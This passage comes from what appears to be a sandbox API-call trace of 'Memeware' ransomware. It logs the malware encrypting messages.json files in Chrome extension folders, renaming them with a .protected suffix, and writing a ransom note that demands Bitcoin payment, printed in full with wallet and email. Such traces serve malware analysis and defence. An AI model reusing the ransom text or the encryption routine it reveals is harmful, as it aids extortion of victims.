Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\..") returned 147 [0079.063] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.063] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.063] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned 
-1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.063] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.063] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.063] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.063] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.063] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.063] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.063] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.063] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 
[0079.063] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.064] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.064] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json") returned 158 [0079.064] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.064] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0079.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff30, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd0, lpOverlapped=0x0) returned 1 [0079.065] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.065] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.065] CloseHandle (hObject=0x168) returned 1 [0079.065] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: 
pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.protected") returned 168 [0079.065] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\messages.json.protected")) returned 1 [0079.065] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.066] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.066] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt") returned 162 [0079.066] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_PT\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\pt_pt\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.066] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.066] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.067] lstrlenA (lpString="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") returned 684 [0079.067] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, 
lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.067] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.067] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.067] CloseHandle (hObject=0x164) returned 1 [0079.067] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Program Files") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="Program Files (x86)") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="$Recycle.bin") returned 1 [0079.067] lstrcmpiW (lpString1="ro", lpString2="System Volume Information") returned -1 [0079.067] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro") returned 141 [0079.067] lstrcmpW (lpString1="ro", lpString2=".") returned 1 [0079.067] lstrcmpW (lpString1="ro", lpString2="..") returned 1 [0079.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*") returned 143 [0079.067] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.067] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.067] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.067] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.067] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\.") returned 143 [0079.067] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.067] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.067] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.067] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.068] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.068] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.068] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.068] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\..") returned 144 [0079.068] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.068] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.068] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 
[0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.068] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.068] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.068] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.068] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.068] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.068] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.068] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.069] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.069] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json") returned 155 [0079.069] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.069] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.069] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff2b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd5, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd5, lpOverlapped=0x0) returned 1 [0079.070] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.070] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.070] CloseHandle (hObject=0x168) returned 1 [0079.070] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected") returned 165 [0079.070] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\messages.json.protected")) returned 1 [0079.071] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.071] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.071] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt") returned 159 [0079.071] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ro\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, 
hTemplateFile=0x0) returned 0x164 [0079.071] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.071] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.072] lstrlenA (lpString="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") returned 684 [0079.072] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, 
lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.072] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.072] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.072] CloseHandle (hObject=0x164) returned 1 [0079.072] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Program Files") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="Program Files (x86)") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="$Recycle.bin") returned 1 [0079.072] lstrcmpiW (lpString1="ru", lpString2="System Volume Information") returned -1 [0079.072] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru") returned 141 [0079.072] lstrcmpW (lpString1="ru", lpString2=".") returned 1 [0079.072] lstrcmpW (lpString1="ru", lpString2="..") returned 1 [0079.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*") returned 143 [0079.072] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\*", lpFindFileData=0x295d930 | out: 
lpFindFileData=0x295d930) returned 0x47bc10 [0079.072] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.072] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.072] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.072] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\.") returned 143 [0079.072] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.072] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.072] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.072] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.073] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.073] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.073] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.073] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\..") returned 144 [0079.073] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.073] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.073] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.073] lstrcmpiW 
(lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.073] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.073] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.073] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.073] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.073] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.073] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\ru\\messages.json") returned 155 [0079.073] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.073] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
